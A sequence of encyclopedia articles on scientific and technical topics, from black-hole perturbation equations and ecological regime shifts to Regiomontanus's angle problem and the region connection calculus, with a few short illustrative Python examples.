where Z + {\displaystyle Z^{+}} characterises the polar perturbations and Z − {\displaystyle Z^{-}} the axial perturbations. Here r ∗ = r + 2 M ln ( r / 2 M − 1 ) {\displaystyle r_{*}=r+2M\ln(r/2M-1)} is the tortoise coordinate (we set G = c = 1 {\displaystyle G=c=1} ), r {\displaystyle r} belongs to the Schwarzschild coordinates ( t , r , θ , φ ) {\displaystyle (t,r,\theta ,\varphi )} , 2 M {\displaystyle 2M} is the Schwarzschild radius and σ {\displaystyle \sigma } represents the time frequency of the perturbations appearing in the form e i σ t {\displaystyle e^{i\sigma t}} . The Regge–Wheeler potential and Zerilli potential are respectively given by
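in a commonly quoted form (written here with the notation of the surrounding text rather than copied from the source), {\displaystyle V^{-}=\left(1-{\frac {2M}{r}}\right)\left({\frac {2(n+1)}{r^{2}}}-{\frac {6M}{r^{3}}}\right),\qquad V^{+}=\left(1-{\frac {2M}{r}}\right){\frac {2n^{2}(n+1)r^{3}+6n^{2}Mr^{2}+18nM^{2}r+18M^{3}}{r^{3}(nr+3M)^{2}}},}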
where 2 n = ( l − 1 ) ( l + 2 ) {\displaystyle 2n=(l-1)(l+2)} and l = 2 , 3 , 4 , … {\displaystyle l=2,3,4,\dots } characterizes the eigenmode for the θ {\displaystyle \theta } coordinate. For gravitational perturbations, the modes l = 0 , 1 {\displaystyle l=0,\,1} are irrelevant because they do not evolve with time. Physically, a gravitational perturbation in the l = 0 {\displaystyle l=0} (monopole) mode represents a change in the black hole mass, whereas the l = 1 {\displaystyle l=1} (dipole) mode corresponds to a shift in the location and value of the black hole's angular momentum. The shapes of the above potentials are exhibited in the figure.
In tortoise coordinates, r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } denotes the event horizon and r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } is equivalent to r → ∞ {\displaystyle r\rightarrow \infty } , i.e., to distances far away from the black hole. The potentials are short-ranged as they decay faster than 1 / r ∗ {\displaystyle 1/r_{*}} ; as r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } we have V ± → 2 ( n + 1 ) / r 2 {\displaystyle V^{\pm }\rightarrow 2(n+1)/r^{2}} and as r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } , we have V ± ∼ e r ∗ / 2 M . {\displaystyle V^{\pm }\sim e^{r_{*}/2M}.} Consequently, the asymptotic behaviour of the solutions for r ∗ → ± ∞ {\displaystyle r_{*}\rightarrow \pm \infty } is e ± i σ r ∗ . {\displaystyle e^{\pm i\sigma r_{*}}.}
In 1975, Subrahmanyan Chandrasekhar and Steven Detweiler discovered a one-to-one mapping between the two equations, leading to a consequence that the spectrum corresponding to both potentials are identical. [ 4 ] The two potentials can also be written as
The relations between Z + {\displaystyle Z^{+}} and Z − {\displaystyle Z^{-}} are given by [ 3 ]
Here V ± {\displaystyle V^{\pm }} is always positive and the problem is one of reflection and transmission of waves incident from r ∗ → ∞ {\displaystyle r_{*}\rightarrow \infty } to r ∗ → − ∞ {\displaystyle r_{*}\rightarrow -\infty } . The problem is essentially the same as that of a reflection and transmission problem by a potential barrier in quantum mechanics. Let the incident wave with unit amplitude be e + i σ r ∗ {\displaystyle e^{+i\sigma r_{*}}} , then the asymptotic behaviours of the solution are given by
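With the time dependence e i σ t {\displaystyle e^{i\sigma t}} assumed above, one consistent way of writing them is {\displaystyle Z\rightarrow e^{+i\sigma r_{*}}+R(\sigma )e^{-i\sigma r_{*}}\quad (r_{*}\rightarrow +\infty ),\qquad Z\rightarrow T(\sigma )e^{+i\sigma r_{*}}\quad (r_{*}\rightarrow -\infty ),}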
where R = R ( σ ) {\displaystyle R=R(\sigma )} and T = T ( σ ) {\displaystyle T=T(\sigma )} are respectively the reflection and transmission amplitudes. In the second equation, we have imposed the physical requirement that no waves emerge from the event horizon.
The reflection and transmission coefficients are thus defined as
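namely as the squared moduli of the corresponding amplitudes, {\displaystyle {\mathcal {R}}^{\pm }=|R^{\pm }(\sigma )|^{2},\qquad {\mathcal {T}}^{\pm }=|T^{\pm }(\sigma )|^{2},}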
subjected to the condition R ± + T ± = 1. {\displaystyle {\mathcal {R}}^{\pm }+{\mathcal {T}}^{\pm }=1.} Because of the inherent connection between the two equations as outlined in the previous section, it turns out [ 3 ]
and consequently, since R + {\displaystyle R^{+}} and R − {\displaystyle R^{-}} differ only in their phases, we get
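{\displaystyle {\mathcal {R}}^{+}={\mathcal {R}}^{-},\qquad {\mathcal {T}}^{+}={\mathcal {T}}^{-}.}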
It is clear from the figure for the reflection coefficient that small-frequency perturbations are readily reflected by the black hole whereas large-frequency ones are absorbed by the black hole. The transition arises around the fundamental quasi-normal mode frequency (see below) for each multipole.
Quasi-normal modes correspond to pure tones of the black hole. These tones are excited when arbitrary, but small, perturbations impinge on a black hole, such as an object falling into it, accretion of matter surrounding it, the last stage of slightly aspherical collapse, the last stage of a binary merger, etc. Unlike the reflection and transmission coefficient problem, quasi-normal modes are characterised by complex-valued σ {\displaystyle \sigma } 's with the convention R e { σ } > 0 {\displaystyle \mathrm {Re} \{\sigma \}>0} . The required boundary conditions are
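(in the form implied by the description that follows) {\displaystyle Z\rightarrow A^{\pm }(\sigma )e^{-i\sigma r_{*}}\quad (r_{*}\rightarrow +\infty ),\qquad Z\rightarrow e^{+i\sigma r_{*}}\quad (r_{*}\rightarrow -\infty ),}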
indicating that we have purely outgoing waves with amplitude A ± {\displaystyle A^{\pm }} and purely ingoing waves at the horizon.
The problem becomes an eigenvalue problem. The quasi-normal modes are of damping type in time, although these waves diverge in space as r ∗ → ± ∞ {\displaystyle r_{*}\to \pm \infty } (this is due to the implicit assumption that the perturbation in quasi-normal modes is 'infinite' in the remote past). [ 3 ] Again, because of the relation mentioned between the two problems, the spectra of Z + {\displaystyle Z^{+}} and Z − {\displaystyle Z^{-}} are identical and thus it is enough to consider the spectrum of Z − . {\displaystyle Z^{-}.} The problem is simplified by introducing [ 4 ]
The nonlinear eigenvalue problem is given by
The solution is found to exist only for a discrete set of values of σ . {\displaystyle \sigma .} [ 5 ] This equation also implies the identity | https://en.wikipedia.org/wiki/Regge–Wheeler–Zerilli_equations |
Regia is a classical building type, a place where a governing authority resides. [ 1 ] [ 2 ] It is among the ancient building types. Others are the tholos , the temple, the theater, the dwelling, and the shop. Buildings according to this type may be rectangular in plan with an interior courtyard . [ 3 ]
This architecture -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regia_(architecture) |
Regime shifts are large, abrupt, persistent changes in the structure and function of ecosystems , the climate , financial and economic systems or other complex systems . [ 1 ] [ 2 ] [ 3 ] [ 4 ] A regime is a characteristic behaviour of a system which is maintained by mutually reinforced processes or feedbacks . Regimes are considered persistent relative to the time period over which the shift occurs. The change of regimes, or the shift, usually occurs when a smooth change in an internal process ( feedback ) or a single disturbance (external shocks) triggers a completely different system behavior. [ 5 ] [ 6 ] [ 7 ] [ 8 ] Although such non-linear changes have been widely studied in different disciplines ranging from atoms to climate dynamics, [ 9 ] regime shifts have gained importance in ecology because they can substantially affect the flow of ecosystem services that societies rely upon, [ 4 ] [ 10 ] such as provision of food, clean water or climate regulation. Moreover, regime shift occurrence is expected to increase as human influence on the planet increases – the Anthropocene [ 11 ] – including current trends on human induced climate change and biodiversity loss . [ 12 ] When regime shifts are associated with a critical or bifurcation point , they may also be referred to as critical transitions . [ 3 ]
Scholars have been interested in systems exhibiting non-linear change for a long time. Since the early twentieth century, mathematicians have developed a body of concepts and theory for the study of such phenomena based on the study of non-linear system dynamics. This research led to the development of concepts such as catastrophe theory ; a branch of bifurcation theory in dynamical systems.
In ecology the idea of systems with multiple regimes, domains of attraction called alternative stable states , only arose in the late '60s based upon the first reflections on the meaning of stability in ecosystems by Richard Lewontin [ 1 ] and Crawford "Buzz" Holling . [ 2 ] The first work on regime shifts in ecosystems was done in a diversity of ecosystems and included important work by Noy-Meir (1975) in grazing systems ; [ 13 ] May (1977) in grazing systems, harvesting systems, insect pests and host- parasitoid systems; [ 14 ] Jones and Walters (1976) with fisheries systems; [ 15 ] and Ludwig et al. (1978) with insect outbreaks . [ 16 ]
These early efforts to understand regime shifts were criticized for the difficulty of demonstrating bi-stability, their reliance on simulation models, and lack of high quality long-term data. [ 17 ] However, by the 1990s more substantial evidence of regime shifts was collected for kelp forest , coral reefs , drylands and shallow lakes. This work led to revitalization of research on ecological reorganization and the conceptual clarification that resulted in the regime shift conceptual framework in the early 2000s. [ 5 ] [ 6 ] [ 7 ] [ 8 ]
Outside of ecology, similar concepts of non-linear change have been developed in other academic disciplines. One example is historical institutionalism in political science , sociology and economics , where concepts like path dependency and critical junctures are used to explain phenomena where the output of a system is determined by its history, or the initial conditions, and where its domains of attraction are reinforced by feedbacks. Concept such as international institutional regimes , socio-technical transitions and increasing returns have an epistemological basis similar to regime shifts, and utilize similar mathematical models.
Over the last decades, research on regime shifts has grown exponentially. Academic papers reported by ISI Web of Knowledge rose from fewer than 5 per year prior to 1990 to more than 300 per year from 2007 to 2011. However, the application of regime-shift-related concepts is still contested.
Although there is no agreement on a single definition, the slight differences among definitions reside in the meaning of stability – the measure of what a regime is – and the meaning of abruptness. Both depend on the definition of the system under study and are therefore relative; in the end it is a matter of scale. Mass extinctions are regime shifts on the geological time scale , while financial crises or pest outbreaks are regime shifts that require a totally different parameter setting.
In order to apply the concept to a particular problem, one has to conceptually limit its range of dynamics by fixing analytical categories such as time and space scales, range of variations and exogenous / endogenous processes. For example, while for oceanographers a regime must last for at least decades and should include climate variability as a driver, [ 17 ] for marine biologists regimes of only five years are acceptable and could be induced by only population dynamics. [ 18 ] A non-exhaustive range of current definitions of regime shifts in recent scientific literature from ecology and allied fields is collected in Table 1.
Table 1. Definitions of regime shifts and modifications used to apply the concept to particular research questions from scientific literature published between 2004 and 2009.
The theoretical basis for regime shifts has been developed from the mathematics of non-linear systems. In short, regime shifts describe dynamics characterized by the possibility that a small disturbance can produce big effects. In such situations the common notion of proportionality between inputs and outputs of a system is incorrect. Conversely, the regime shift concept also emphasizes the resilience of systems – suggesting that in some situations substantial management or human impact can have little effect on a system. Regime shifts are hard to reverse and in some cases irreversible. The regime shift concept shifts analytical attention away from linearity and predictability, towards reorganization and surprise. Thus, the regime shift concept offers a framework to explore the dynamics and causal explanations of non-linear change in nature and society.
Regime shifts are triggered either by the weakening of stabilizing internal processes – feedbacks – or by external shocks which exceed the stabilizing capacity of a system.
Systems prone to regime shifts can show three different types of change: smooth, abrupt or discontinuous, [ 6 ] depending on the configuration of processes that define a system – in particular the interaction between a system's fast and slow processes. Smooth change can be described by a quasi-linear relationship between fast and slow processes; abrupt change shows a non-linear relationship among fast and slow variables, while discontinuous change is characterized by the difference in the trajectory on the fast variable when the slow one increases compared to when it decreases. [ 17 ] In other words, the point at which the system flips from one regime to another is different from the point at which the system flips back. Systems that exhibit this last type of change demonstrate hysteresis . Hysteretic systems have two important properties. First, the reversal of discontinuous change requires that a system change back past the conditions at which the change first occurred. [ 5 ] This occurs because systemic change alters feedback processes that maintain a system in a particular regime. [ 22 ] Second, hysteresis greatly enhances the role of history in a system, and demonstrates that the system has memory – in that its dynamics are shaped by past events.
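A toy model makes the discontinuous, hysteretic case concrete. The sketch below (a minimal illustration based on the generic bistable "fold" model, not a model taken from the cited literature) sweeps a slow driver up and then down and records the equilibrium of the fast variable; the state jumps between regimes at two clearly different driver values:

import numpy as np

def equilibrate(driver_values, x0, dt=0.01, steps=5000):
    # Quasi-static response of a fast variable x governed by
    # dx/dt = a + x - x**3 (a generic bistable "fold" model) while the
    # slow driver a is stepped through driver_values.
    states, x = [], x0
    for a in driver_values:
        for _ in range(steps):          # let x settle before moving the driver again
            x += dt * (a + x - x**3)
        states.append(x)
    return np.array(states)

a_values = np.linspace(-1.0, 1.0, 81)
forward = equilibrate(a_values, x0=-1.0)           # driver slowly increased
backward = equilibrate(a_values[::-1], x0=1.0)     # driver slowly decreased
# The jump to the upper regime and the jump back occur at clearly
# different driver values: that gap is the hysteresis loop.
print(a_values[np.argmax(np.diff(forward) > 0.5)])
print(a_values[::-1][np.argmax(np.diff(backward) < -0.5)])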
Conditions at which a system shifts its dynamics from one set of processes to another are often called thresholds. In ecology for example, a threshold is a point at which there is an abrupt change in an ecosystem quality, property or phenomenon; or where small changes in an environmental driver produce large responses in an ecosystem. [ 23 ] Thresholds are, however, a function of several interacting parameters, thus they change in time and space. Hence, the same system can present smooth, abrupt or discontinuous change depending on its parameters' configurations. Thresholds will be present, however, only in cases where abrupt and discontinuous change is possible.
Empirical evidence has increasingly complemented model-based work on regime shifts. Early work on regime shifts in ecology was developed in models for predation, grazing, fisheries and insect outbreak dynamics. Since the 1980s, further development of models has been complemented by empirical evidence for regime shifts from ecosystems including kelp forest , coral reefs , drylands and lakes .
Scholars have collected evidence for regime shifts across a wide variety of ecosystems and across a range of scales. For example, at the local scale, one of the best documented examples is woody plant encroachment , which is thought to follow a smooth change dynamic. [ 7 ] Woody encroachment refers to small changes in herbivory rates that can shift drylands from grassy dominated regimes towards woody dominated savannas. Encroachment has been documented to impact ecosystem services related with cattle ranching in wet savannas in Africa and South America. [ 24 ] [ 25 ] [ 26 ] At the regional scale, rainforest areas in the Amazon and East Asia are thought to be at risk of shifting towards savanna regimes given the weakening of the moisture recycling feedback driven by deforestation . [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] The shift from forest to savanna potentially affects the provision of food, fresh water, climate regulation and support for biodiversity. On the global realm, the faster retreating of the arctic ice sheet in summer time is reinforcing climate warming through the albedo feedback, potentially affecting sea water levels and climate regulation worldwide.
Aquatic systems have been heavily studied in the search for regime shifts. Lakes work like microcosms (almost closed systems ) that to some extent allow experimentation and data gathering. [ 2 ] [ 33 ] [ 34 ] Eutrophication is a well-documented abrupt change from clear water to murky water regimes, which leads to toxic algae blooms and reduction of fish productivity in lakes and coastal ecosystems. [ 33 ] [ 35 ] [ 36 ] Eutrophication is driven by nutrient inputs, particularly those coming from fertilizers used in agriculture. It is an example of discontinuous change with hysteresis. Once the lake has shifted to a murky water regime, a new feedback of phosphorus recycling maintains the system in the eutrophic state even if nutrient inputs are significantly reduced.
Another example widely studied in aquatic and marine systems is trophic level decline in food webs . It usually implies the shift from ecosystems dominated by high numbers of predatory fish to a regime dominated by lower trophic groups like pelagic planktivores (i.e. jellyfish). [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] Affected food webs often have impacts on fisheries productivity, a major risk of eutrophication , hypoxia , invasion of non-native species and impacts on recreational values. Hypoxia, or the development of so-called death zones, is another regime shift in aquatic and marine-coastal environments. Hypoxia, similarly to eutrophication, is driven by nutrient inputs of anthropogenic origin but also from natural origin in the form of upwellings . In high nutrient concentrations the levels of dissolved oxygen decrease, making life impossible for the majority of aquatic organisms. [ 42 ] Impacts on ecosystem services include collapse of fisheries and the production of toxic gases for humans.
In marine systems, two well-studied regime shifts happen in coral reefs and kelp forests. Coral reefs are three-dimensional structures which work as habitat for marine biodiversity. Hard coral-dominated reefs can shift to a regime dominated by fleshy algae; [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] but they also have been reported to shift towards soft-corals, corallimorpharians, urchin barrens or sponge-dominated regimes. [ 18 ] [ 48 ] Coral reef transitions are reported to affect ecosystem services like calcium fixation, water cleansing, support for biodiversity, fisheries productivity, coastline protection and recreational services. [ 49 ] [ 50 ] On the other hand, kelp forests are highly productive marine ecosystems found in temperate regions of the ocean. Kelp forests are characteristically dominated by brown macroalgae and host high levels of biodiversity, providing provisioning ecosystem services for both the cosmetic industry and fisheries. Such services are substantially reduced when a kelp forest shifts towards urchin barren regimes driven mainly by discharge of nutrients from the coast and overfishing. Overfishing and overharvest of keystone predators, such as sea otters , applies top-down pressure on the system. Bottom-up pressure arises from nutrient pollution . [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ]
Soil salinization is an example of a well-known regime shift in terrestrial systems. It is driven by the removal of deep root vegetation and irrigation, which causes elevation of the soil water table and the increase of soil surface salinity. Once the system flips, ecosystem services related with food production – both crops and cattle – are significantly reduced. [ 57 ] Dryland degradation , also known as desertification , is a well-known but controversial type of regime shift. Dryland degradation occurs when the loss of vegetation transforms an ecosystem from being vegetated to being dominated by bare soils. While this shift has been proposed to be driven by a combination of farming and cattle grazing, loss of semi-nomad traditions, extension of infrastructure, reduction of managerial flexibility and other economic factors, it is controversial because it has been difficult to determine whether there is indeed a regime shift and which drivers have caused it. For example, poverty has been proposed as a driver of dry land degradation, but studies continuously find contradictory evidence. [ 58 ] [ 59 ] [ 60 ] [ 61 ] Ecosystem services affected by dry land degradation usually include low biomass productivity, thus reducing provisioning and supporting services for agriculture and water cycling.
Polar regions have been the focus of research examining the impacts of climate warming. Regime shifts in polar regions include the melting of the Greenland ice sheet and the possible collapse of the thermohaline circulation system. While the melting of the Greenland ice sheet is driven by global warming and threatens worldwide coastlines with an increase in sea level, the collapse of the thermohaline circulation is driven by the increase of fresh water in the North Atlantic which in turn weakens the density-driven water transport between the tropics and polar areas. [ 62 ] [ 63 ] Both regime shifts have serious implications for marine biodiversity, water cycling, security of housing and infrastructure and climate regulation amongst other ecosystem services.
Using current well-known statistical methods such as average standard deviates , principal component analysis , or artificial neural networks , [ 64 ] [ 20 ] one can detect whether a regime shift has occurred. Such analyses require long-term data series and require that the threshold under study has actually been crossed. [ 20 ] Hence, the answer will depend on the quality of the data; the approach is event-driven and only allows one to explore past trends.
Some scholars have argued based on statistical analysis of time series that certain phenomena do not correspond to regime shifts. [ 65 ] [ 66 ] [ 67 ] [ 68 ] Nevertheless, the statistical rejection of the hypothesis that a system has multiple attractors does not imply that the null hypothesis is true. [ 6 ] In order to do so one has to prove that the system only has one attractor. In other words, evidence that data does not exhibit multiple regimes does not rule out the possibility a system could shift to an alternative regime in the future. Moreover, in management decision making, it can be risky to assume that a system has only one regime, when plausible alternative regimes have highly negative consequences. [ 6 ]
On the other hand, a more relevant question than "has a regime shift occurred?" is "is the system prone to regime shifts?". This question is important because, even if they have shown smooth change in the past, their dynamics can potentially become abrupt or discontinuous in the future depending on its parameters' configuration. Such a question has been explored separately in different disciplines for different systems, pushing methods development forward (e.g. climate driven regime shifts in the ocean [ 66 ] or the stability of food webs [ 69 ] [ 70 ] ) and continuing to inspire new research.
Regime shift research is occurring across multiple ecosystems and at multiple scales. New areas of research include early warnings of regime shifts and new forms of modeling.
It remains unclear how well such signals work for all regime shifts, and if the early warnings give time enough to take appropriate managerial corrections to avoid the shift. [ 82 ] [ 4 ] Additionally, early warning signals also depend on intensive good-quality data series that are rare in ecology. However, researchers have used high quality data to predict regime shifts in a lake ecosystem. [ 83 ] Changes in spatial patterns as an indicator of regime shifts have also become a topic of research. [ 30 ] [ 84 ] [ 85 ]
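As a rough illustration of how such early-warning indicators are commonly computed (a minimal sketch of generic rolling-window statistics on a made-up time series, not an implementation of any particular published detector), rising variance and lag-1 autocorrelation in a sliding window are the signals most often tracked:

import numpy as np

def rolling_warning_signals(series, window):
    # Lag-1 autocorrelation and variance in a sliding window; sustained
    # upward trends in both are the "critical slowing down" signature
    # discussed in the early-warning literature.
    ac1, var = [], []
    for start in range(len(series) - window + 1):
        w = np.asarray(series[start:start + window], dtype=float)
        var.append(w.var())
        ac1.append(np.corrcoef(w[:-1], w[1:])[0, 1])
    return np.array(ac1), np.array(var)

# Made-up record: a noisy variable that begins drifting late in the series.
rng = np.random.default_rng(0)
t = np.arange(400)
record = np.where(t < 300, 0.0, 0.01 * (t - 300)) + rng.normal(0.0, 0.1, t.size)
ac1, var = rolling_warning_signals(record, window=50)
print(ac1[-1], var[-1])   # indicators computed near the end of the record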
Another front of research is the development of new approaches to modeling. Dynamic models , [ 86 ] [ 87 ] Bayesian belief networks , [ 88 ] Fisher information , [ 89 ] and fuzzy cognitive maps [ 90 ] have been used as a tool to explore the phase space where regime shifts are likely to happen and understand the dynamics that govern dynamic thresholds. Models are useful oversimplifications of reality, whose limits are given by the current understanding of the real system as well as the assumptions of the modeler. Therefore, a deep understanding of causal relationships and the strength of feedbacks is required to capture possible regime shift dynamics. Nevertheless, such deep understanding is available only for heavily studied systems such as shallow lakes. Methods development is required to tackle the problem of limited time series data and limited understanding of system dynamics , in such a way that allow identification of the main drivers of regime shifts as well as prioritization of managerial options.
Other emerging areas of research include the role of regime shifts in the earth system, cascading consequences among regime shifts, and regime shifts in social-ecological systems. | https://en.wikipedia.org/wiki/Regime_shift |
The Regiment of the North Pole , an outdated medieval astronomy term, is a rule for finding the celestial North Pole by the stars. It was used in former centuries when, because of precession , the star Polaris was much further from the celestial North Pole than it is now.
As of the AD 2000 precession epoch , the rule would be: "From Polaris , go directly away from the Pointers (βγ Ursae Minoris ) by about 1.45 times the apparent diameter of the Full Moon ."
This astronomy -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regiment_of_the_North_Pole |
Regina is a suite of mathematical software for 3-manifold topologists . It focuses upon the study of 3-manifold triangulations and includes support for normal surfaces and angle structures. [ 1 ]
This topology-related article is a stub . You can help Wikipedia by expanding it .
This scientific software article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regina_(program) |
In mathematics , Regiomontanus's angle maximization problem is a famous optimization problem [ 1 ] posed by the 15th-century German mathematician Johannes Müller [ 2 ] (also known as Regiomontanus ). The problem is as follows:
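In its usual modern phrasing: a painting hangs on a wall, with the bottom and top of the painting at known heights above the observer's eye level; at what distance from the wall should the observer stand so that the painting subtends the largest possible angle at the eye?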
If the viewer stands too close to the wall or too far from the wall, the angle is small; somewhere in between it is as large as possible.
The same approach applies to finding the optimal place from which to kick a ball in rugby. [ 3 ] For that matter, it is not necessary that the alignment of the picture be at right angles: we might be looking at a window of the Leaning Tower of Pisa or a realtor showing off the advantages of a sky-light in a sloping attic roof.
There is a unique circle passing through the top and bottom of the painting and tangent to the eye-level line. By elementary geometry, if the viewer's position were to move along the circle, the angle subtended by the painting would remain constant . All positions on the eye-level line except the point of tangency are outside of the circle, and therefore the angle subtended by the painting from those points is smaller.
The point of tangency can be constructed by the following steps: [ 4 ] [ 5 ]
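One such construction (stated here in the form that matches the justification below) is: reflect the bottom of the painting in the eye-level line; draw the circle having the segment from the top of the painting to this reflected point as its diameter; the point where this circle crosses the eye-level line, on the viewer's side of the wall, is the optimal viewing position.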
This can be shown to correctly construct the point of tangency by using Euclid's Elements , Book III, Proposition 36 (alternatively the power-of-a-point theorem ) to show that the distance from the wall to the point of tangency is the geometric mean of the heights of the top and bottom of the painting. Equivalently, a square with this distance as its side length has the same area as a rectangle with the two heights as its sides. Then, the construction of a circle with the top of the painting diametrically opposite the reflected bottom, and its intersection with the line at eye level, follows Euclid's Book II, Proposition 14, which describes how to construct a square with the same area as a given rectangle.
In the present day, this problem is widely known because it appears as an exercise in many first-year calculus textbooks (for example that of Stewart [ 6 ] ).
Let
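a be the height of the bottom of the painting above eye level, b the height of the top of the painting above eye level, x the viewer's distance from the wall, α the angle of elevation of the bottom of the painting as seen from the viewer's position, and β the angle of elevation of the top of the painting (the names are chosen to match how a , b and x are used in the lines that follow).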
The angle we seek to maximize is β − α . The tangent of the angle increases as the angle increases; therefore it suffices to maximize
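{\displaystyle \tan(\beta -\alpha )={\frac {\tan \beta -\tan \alpha }{1+\tan \beta \tan \alpha }}={\frac {b/x-a/x}{1+ab/x^{2}}}=(b-a)\cdot {\frac {x}{x^{2}+ab}},} using tan ⁡ α = a / x {\displaystyle \tan \alpha =a/x} and tan ⁡ β = b / x {\displaystyle \tan \beta =b/x} .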
Since b − a is a positive constant, we only need to maximize the fraction that follows it. Differentiating, we get
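{\displaystyle {\frac {d}{dx}}\,{\frac {x}{x^{2}+ab}}={\frac {(x^{2}+ab)-x\cdot 2x}{(x^{2}+ab)^{2}}}={\frac {ab-x^{2}}{(x^{2}+ab)^{2}}},} which is positive when x < a b {\displaystyle x<{\sqrt {ab}}} and negative when x > a b {\displaystyle x>{\sqrt {ab}}} .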
Therefore the angle increases as x goes from 0 to √ ab and decreases as x increases from √ ab . The angle is therefore as large as possible precisely when x = √ ab , the geometric mean of a and b .
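A quick numerical check of this result (a minimal sketch; the heights a = 2 and b = 5 are made-up values used only for illustration):

import numpy as np

# Hypothetical picture: bottom 2 m and top 5 m above eye level.
a, b = 2.0, 5.0
x = np.linspace(0.01, 20.0, 200001)             # candidate viewing distances
angle = np.arctan(b / x) - np.arctan(a / x)     # subtended angle beta - alpha
print(x[np.argmax(angle)])                      # numerically optimal distance
print(np.sqrt(a * b))                           # sqrt(ab) = 3.162..., as derived above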
We have seen that it suffices to maximize
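{\displaystyle {\frac {x}{x^{2}+ab}}.}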
This is equivalent to minimizing the reciprocal:
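{\displaystyle {\frac {x^{2}+ab}{x}}=x+{\frac {ab}{x}}.}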
Observe that this last quantity is equal to
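{\displaystyle x+{\frac {ab}{x}}=\left({\sqrt {x}}\right)^{2}+\left({\sqrt {ab/x}}\right)^{2},} a sum of two squares.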
Thus when we have u 2 + v 2 , we can add the middle term −2 uv to get a perfect square. We have
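{\displaystyle u^{2}+v^{2}=(u-v)^{2}+2uv.}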
If we regard x as u 2 and ab / x as v 2 , then u = √ x and v = √ ab / x , and so
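{\displaystyle 2uv=2{\sqrt {x}}\,{\sqrt {ab/x}}=2{\sqrt {ab}}.}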
Thus we have
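{\displaystyle x+{\frac {ab}{x}}=\left({\sqrt {x}}-{\sqrt {ab/x}}\right)^{2}+2{\sqrt {ab}}.}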
This is as small as possible precisely when the square is 0, and that happens when x = √ ab . Alternatively, we might cite this as an instance of the inequality between the arithmetic and geometric means. | https://en.wikipedia.org/wiki/Regiomontanus'_angle_maximization_problem |
The region connection calculus ( RCC ) is intended to serve for qualitative spatial representation and reasoning . RCC abstractly describes regions (in Euclidean space , or in a topological space ) by their possible relations to each other. RCC8 consists of 8 basic relations that are possible between two regions:
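disconnected (DC); externally connected (EC); equal (EQ); partially overlapping (PO); tangential proper part (TPP); tangential proper part inverse (TPPi); non-tangential proper part (NTPP); and non-tangential proper part inverse (NTPPi).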
From these basic relations, combinations can be built. For example, proper part (PP) is the union of TPP and NTPP.
RCC is governed by two axioms. [ 1 ]
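The first axiom states that every region connects with itself, and the second states that if a region X connects with a region Y, then Y connects with X; in other words, the connection relation C is reflexive and symmetric.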
The two axioms describe two features of the connection relation, but not the characteristic feature of the connection relation. [ 2 ] For example, we can say that an object is less than 10 meters away from itself and that if object A is less than 10 meters away from object B, object B will be less than 10 meters away from object A. So, the relation 'less-than-10-meters' also satisfies the above two axioms, but does not talk about the connection relation in the intended sense of RCC.
The composition table of RCC8 is as follows:
Usage example: if a TPP b and b EC c, (row 4, column 2) of the table says that a DC c or a EC c.
The RCC8 calculus is intended for reasoning about spatial configurations. Consider the following example: two houses are connected via a road. Each house is located on an own property. The first house possibly touches the boundary of the property; the second one surely does not. What can we infer about the relation of the second property to the road?
The spatial configuration can be formalized in RCC8 as the following constraint network :
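One plausible encoding of the description above (the exact label sets are a reconstruction, chosen to be consistent with the reasoning that follows):
house1 DC house2
house1 { TPP, NTPP } property1
house1 { DC, EC } property2
house1 EC road
house2 { DC, EC } property1
house2 NTPP property2
house2 EC road
property1 { DC, EC } property2
road (initially unconstrained, all eight base relations possible) property1
road (initially unconstrained, all eight base relations possible) property2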
Using the RCC8 composition table and the path-consistency algorithm , we can refine the network in the following way:
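(again reconstructed from the discussion that follows)
road { PO, EC } property1
road { PO, TPP } property2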
That is, the road either overlaps (PO) property2 , or is a tangential proper part of it. But, if the road is a tangential proper part of property2 , then the road can only be externally connected (EC) to property1 . That is, road PO property1 is not possible when road TPP property2 . This fact is not obvious, but can be deduced once we examine the consistent "singleton-labelings" of the constraint network. The following paragraph briefly describes singleton-labelings.
First, we note that the path-consistency algorithm will also reduce the possible relations between house2 and property1 from { DC, EC } to just DC . So, the path-consistency algorithm still leaves multiple possible constraints on 5 of the edges in the constraint network. Since each of these edges carries 2 possible constraints, the network can be expanded into 32 (2^5) unique constraint networks, each containing only a single label on each edge ("singleton labelings"). However, of the 32 possible singleton labelings, only 9 are consistent. (See qualreas for details.) Only one of the consistent singleton labelings has the edge road TPP property2 , and the same labeling includes road EC property1 .
Other versions of the region connection calculus include RCC5 (with only five basic relations - the distinction whether two regions touch each other are ignored) and RCC23 (which allows reasoning about convexity).
RCC8 has been partially [ clarification needed ] implemented in GeoSPARQL as described below: | https://en.wikipedia.org/wiki/Region_connection_calculus |
The Regional Positioning and Timing System ( Turkish : Bölgesel Konumlama ve Zamanlama Sistemi ), shortly BKZS , is a space-based project of the Turkish Armed Forces on global positioning and time transfer by satellite navigation system .
The aim of the project is to provide positioning and timing information, which Turkish Armed Forces need during peace, crisis and military operations , independently from the existing foreign systems, which can be disabled in times of conflict. [ 1 ] The project is developed by the Defence Technologies and Engineering Inc. (Savunma Teknolojileri ve Mühendislik A.Ş.) (STM), a subsidiary of the Undersecretariat for Defence Industries. Currently, the project is in the first phase, comprising evaluation of the feasibility study. [ 2 ] [ 3 ] It is planned to launch five military reconnaissance and Earth observation satellites over the next few years. [ 4 ] [ obsolete source ]
This space - or spaceflight -related article is a stub . You can help Wikipedia by expanding it .
This article about the military of Turkey is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regional_Positioning_and_Timing_System_(Turkey) |
A Regional Red List is a report of the threatened status of species within a certain country or region. It is based on the IUCN Red List of Threatened Species, an inventory of the conservation status of species on a global scale. Regional Red Lists assess the risk of extinction to species within a political management unit and therefore may feed directly into national and regional planning. This project is coordinated by the Zoological Society of London , the World Conservation Union (IUCN) and partners in national governments, universities and organizations throughout the world.
Regional Red Lists may assist countries or regions in:
